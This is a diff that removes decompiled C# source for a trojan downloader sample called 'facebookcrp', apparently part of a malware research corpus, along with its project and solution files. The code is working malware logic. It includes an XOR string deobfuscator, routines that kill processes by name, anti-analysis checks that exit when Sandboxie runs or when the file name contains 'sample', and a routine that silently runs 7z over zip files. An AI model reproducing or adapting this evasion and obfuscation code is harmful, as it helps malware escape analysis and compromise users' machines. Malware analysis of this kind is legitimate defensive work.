long num1 = (long) Strings.Len(JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUdaze);
|
|
||||||
long Start = 1;
|
|
||||||
string str;
|
|
||||||
while (Start <= num1)
|
|
||||||
{
|
|
||||||
int num2 = Strings.Asc(Strings.Mid(JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUdaze, checked ((int) Start), 1));
|
|
||||||
int num3 = Strings.Asc(Strings.Mid(JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUas, checked ((int) (unchecked (Start % (long) Strings.Len(JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUas)) + 1L)), 1));
|
|
||||||
str += Conversions.ToString(Strings.Chr(num2 ^ num3));
|
|
||||||
checked { ++Start; }
|
|
||||||
}
|
|
||||||
return str;
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU16(
|
|
||||||
string JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU86)
|
|
||||||
{
|
|
||||||
Process[] processes = Process.GetProcesses();
|
|
||||||
int index = 0;
|
|
||||||
while (index < processes.Length)
|
|
||||||
{
|
|
||||||
Process process = processes[index];
|
|
||||||
if (process.ProcessName.Contains(JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU86))
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
process.Kill();
|
|
||||||
}
|
|
||||||
catch (Exception ex)
|
|
||||||
{
|
|
||||||
ProjectData.SetProjectError(ex);
|
|
||||||
ProjectData.ClearProjectError();
|
|
||||||
}
|
|
||||||
}
|
|
||||||
checked { ++index; }
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU17()
|
|
||||||
{
|
|
||||||
if (Process.GetProcessesByName("SbieSvc").Length < 1)
|
|
||||||
return;
|
|
||||||
Environment.Exit(0);
|
|
||||||
}
|
|
||||||
|
|
||||||
private static void JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU18()
|
|
||||||
{
|
|
||||||
if (!Process.GetCurrentProcess().MainModule.FileName.Contains("sample"))
|
|
||||||
return;
|
|
||||||
Environment.Exit(0);
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU26(
|
|
||||||
string JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU87,
|
|
||||||
string JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU88)
|
|
||||||
{
|
|
||||||
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles);
|
|
||||||
ListBox listBox = new ListBox();
|
|
||||||
try
|
|
||||||
{
|
|
||||||
string[] directories = Directory.GetDirectories(JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU87);
|
|
||||||
int index1 = 0;
|
|
||||||
while (index1 < directories.Length)
|
|
||||||
{
|
|
||||||
string str1 = directories[index1];
|
|
||||||
string[] files = Directory.GetFiles(FileSystem.Dir(), "*.zip");
|
|
||||||
int index2 = 0;
|
|
||||||
while (index2 < files.Length)
|
|
||||||
{
|
|
||||||
string str2 = files[index2];
|
|
||||||
listBox.Items.Add((object) str2);
|
|
||||||
checked { ++index2; }
|
|
||||||
}
|
|
||||||
JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU26(FileSystem.Dir(), JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU88);
|
|
||||||
checked { ++index1; }
|
|
||||||
}
|
|
||||||
}
|
|
||||||
catch (Exception ex)
|
|
||||||
{
|
|
||||||
ProjectData.SetProjectError(ex);
|
|
||||||
ProjectData.ClearProjectError();
|
|
||||||
}
|
|
||||||
try
|
|
||||||
{
|
|
||||||
foreach (object obj in listBox.Items)
|
|
||||||
{
|
|
||||||
string str = Conversions.ToString(obj);
|
|
||||||
Process.Start(new ProcessStartInfo()
|
|
||||||
{
|
|
||||||
FileName = folderPath + "\\7-Zipz\\7z.exe",
|
|
||||||
Arguments = " a " + str.ToString() + " " + JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU88,
|
|
||||||
WindowStyle = ProcessWindowStyle.Hidden
|
|
||||||
});
|
|
||||||
}
|
|
||||||
}
|
|
||||||
finally
|
|
||||||
{
|
|
||||||
IEnumerator enumerator;
|
|
||||||
if (enumerator is IDisposable)
|
|
||||||
(enumerator as IDisposable).Dispose();
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,18 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: My.MyApplication
|
|
||||||
// Assembly: facebookcrp, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 36230979-21AB-4175-8299-493F28407E94
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Downloader.MSIL.Crypted.z-93b16aa9542c8f7cc4b6cf48ce2f51cb3b97b71f055792d21209854cefb87d1a.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic.ApplicationServices;
|
|
||||||
using System.CodeDom.Compiler;
|
|
||||||
using System.ComponentModel;
|
|
||||||
|
|
||||||
namespace My
|
|
||||||
{
|
|
||||||
[GeneratedCode("MyTemplate", "8.0.0.0")]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
internal class MyApplication : ApplicationBase
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,24 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: My.MyComputer
|
|
||||||
// Assembly: facebookcrp, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 36230979-21AB-4175-8299-493F28407E94
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Downloader.MSIL.Crypted.z-93b16aa9542c8f7cc4b6cf48ce2f51cb3b97b71f055792d21209854cefb87d1a.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic.Devices;
|
|
||||||
using System.CodeDom.Compiler;
|
|
||||||
using System.ComponentModel;
|
|
||||||
using System.Diagnostics;
|
|
||||||
|
|
||||||
namespace My
|
|
||||||
{
|
|
||||||
[GeneratedCode("MyTemplate", "8.0.0.0")]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
internal class MyComputer : Computer
|
|
||||||
{
|
|
||||||
[DebuggerHidden]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
public MyComputer()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,108 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: My.MyProject
|
|
||||||
// Assembly: facebookcrp, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 36230979-21AB-4175-8299-493F28407E94
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Downloader.MSIL.Crypted.z-93b16aa9542c8f7cc4b6cf48ce2f51cb3b97b71f055792d21209854cefb87d1a.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic;
|
|
||||||
using Microsoft.VisualBasic.ApplicationServices;
|
|
||||||
using Microsoft.VisualBasic.CompilerServices;
|
|
||||||
using System;
|
|
||||||
using System.CodeDom.Compiler;
|
|
||||||
using System.ComponentModel;
|
|
||||||
using System.ComponentModel.Design;
|
|
||||||
using System.Diagnostics;
|
|
||||||
using System.Runtime.CompilerServices;
|
|
||||||
using System.Runtime.InteropServices;
|
|
||||||
|
|
||||||
namespace My
|
|
||||||
{
|
|
||||||
[GeneratedCode("MyTemplate", "8.0.0.0")]
|
|
||||||
[StandardModule]
|
|
||||||
[HideModuleName]
|
|
||||||
internal sealed class MyProject
|
|
||||||
{
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
|
|
||||||
|
|
||||||
[HelpKeyword("My.Computer")]
|
|
||||||
internal static MyComputer Computer
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[HelpKeyword("My.Application")]
|
|
||||||
internal static MyApplication Application
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[HelpKeyword("My.User")]
|
|
||||||
internal static User User
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[HelpKeyword("My.WebServices")]
|
|
||||||
internal static MyProject.MyWebServices WebServices
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
internal sealed class MyWebServices
|
|
||||||
{
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[DebuggerHidden]
|
|
||||||
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
public override int GetHashCode() => base.GetHashCode();
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
internal new Type GetType() => typeof (MyProject.MyWebServices);
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[DebuggerHidden]
|
|
||||||
public override string ToString() => base.ToString();
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[DebuggerHidden]
|
|
||||||
public MyWebServices()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[ComVisible(false)]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
internal sealed class ThreadSafeObjectProvider<T> where T : new()
|
|
||||||
{
|
|
||||||
internal T GetInstance
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get
|
|
||||||
{
|
|
||||||
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
|
|
||||||
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
|
|
||||||
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[DebuggerHidden]
|
|
||||||
public ThreadSafeObjectProvider()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,49 +0,0 @@
|
|||||||
<?xml version="1.0" encoding="utf-8"?>
|
|
||||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
|
||||||
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Downloader.MSIL.Crypted.z-93b16aa9542c8f7cc4b6cf48ce2f51cb3b97b71f055792d21209854cefb87d1a.exe-->
|
|
||||||
<PropertyGroup>
|
|
||||||
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
|
|
||||||
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
|
|
||||||
<ProjectGuid>{7E814358-3C62-4C8F-9803-90BC753F1D53}</ProjectGuid>
|
|
||||||
<OutputType>WinExe</OutputType>
|
|
||||||
<AssemblyName>facebookcrp</AssemblyName>
|
|
||||||
<ApplicationVersion>0.0.0.0</ApplicationVersion>
|
|
||||||
<RootNamespace>My</RootNamespace>
|
|
||||||
</PropertyGroup>
|
|
||||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
|
|
||||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
|
||||||
<DebugSymbols>true</DebugSymbols>
|
|
||||||
<DebugType>full</DebugType>
|
|
||||||
<Optimize>false</Optimize>
|
|
||||||
<OutputPath>bin\Debug\</OutputPath>
|
|
||||||
<DefineConstants>DEBUG;TRACE</DefineConstants>
|
|
||||||
<ErrorReport>prompt</ErrorReport>
|
|
||||||
<WarningLevel>4</WarningLevel>
|
|
||||||
</PropertyGroup>
|
|
||||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
|
|
||||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
|
||||||
<DebugType>pdbonly</DebugType>
|
|
||||||
<Optimize>true</Optimize>
|
|
||||||
<OutputPath>bin\Release\</OutputPath>
|
|
||||||
<DefineConstants>TRACE</DefineConstants>
|
|
||||||
<ErrorReport>prompt</ErrorReport>
|
|
||||||
<WarningLevel>4</WarningLevel>
|
|
||||||
</PropertyGroup>
|
|
||||||
<ItemGroup>
|
|
||||||
<Reference Include="Microsoft.VisualBasic" />
|
|
||||||
<Reference Include="System" />
|
|
||||||
<Reference Include="System.Windows.Forms" />
|
|
||||||
</ItemGroup>
|
|
||||||
<ItemGroup>
|
|
||||||
<Compile Include="rp.cs" />
|
|
||||||
<Compile Include="JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJ.cs" />
|
|
||||||
<Compile Include="MyApplication.cs" />
|
|
||||||
<Compile Include="MyComputer.cs" />
|
|
||||||
<Compile Include="MyProject.cs" />
|
|
||||||
<Compile Include="AssemblyInfo.cs" />
|
|
||||||
</ItemGroup>
|
|
||||||
<ItemGroup>
|
|
||||||
<EmbeddedResource Include="write.dat" />
|
|
||||||
</ItemGroup>
|
|
||||||
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
|
|
||||||
</Project>
|
|
@ -1,20 +0,0 @@
|
|||||||
|
|
||||||
Microsoft Visual Studio Solution File, Format Version 9.00
|
|
||||||
# Visual Studio 2005
|
|
||||||
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "facebookcrp", "Trojan-Downloader.MSIL.Crypted.z-93b16aa9542c8f7cc4b6cf48ce2f51cb3b97b71f055792d21209854cefb87d1a.csproj", "{7E814358-3C62-4C8F-9803-90BC753F1D53}"
|
|
||||||
EndProject
|
|
||||||
Global
|
|
||||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
|
||||||
Debug|Any CPU = Debug|Any CPU
|
|
||||||
Release|Any CPU = Release|Any CPU
|
|
||||||
EndGlobalSection
|
|
||||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
|
||||||
{7E814358-3C62-4C8F-9803-90BC753F1D53}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
|
|
||||||
{7E814358-3C62-4C8F-9803-90BC753F1D53}.Debug|Any CPU.Build.0 = Debug|Any CPU
|
|
||||||
{7E814358-3C62-4C8F-9803-90BC753F1D53}.Release|Any CPU.ActiveCfg = Release|Any CPU
|
|
||||||
{7E814358-3C62-4C8F-9803-90BC753F1D53}.Release|Any CPU.Build.0 = Release|Any CPU
|
|
||||||
EndGlobalSection
|
|
||||||
GlobalSection(SolutionProperties) = preSolution
|
|
||||||
HideSolutionNode = FALSE
|
|
||||||
EndGlobalSection
|
|
||||||
EndGlobal
|
|
@ -1,487 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: rp
|
|
||||||
// Assembly: facebookcrp, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 36230979-21AB-4175-8299-493F28407E94
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Downloader.MSIL.Crypted.z-93b16aa9542c8f7cc4b6cf48ce2f51cb3b97b71f055792d21209854cefb87d1a.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic;
|
|
||||||
using Microsoft.VisualBasic.CompilerServices;
|
|
||||||
using System;
|
|
||||||
using System.ComponentModel;
|
|
||||||
using System.Runtime.CompilerServices;
|
|
||||||
using System.Runtime.InteropServices;
|
|
||||||
using System.Text;
|
|
||||||
using System.Threading;
|
|
||||||
using System.Windows.Forms;
|
|
||||||
|
|
||||||
[StandardModule]
|
|
||||||
public sealed class rp
|
|
||||||
{
|
|
||||||
public const long JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUoo = 512;
|
|
||||||
public const long JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUooo = 64;
|
|
||||||
public const long JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUoooo = 128;
|
|
||||||
public const long JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUooooo = 32;
|
|
||||||
public const long JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUoooooo = 16;
|
|
||||||
public const long JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUooooooo = 8;
|
|
||||||
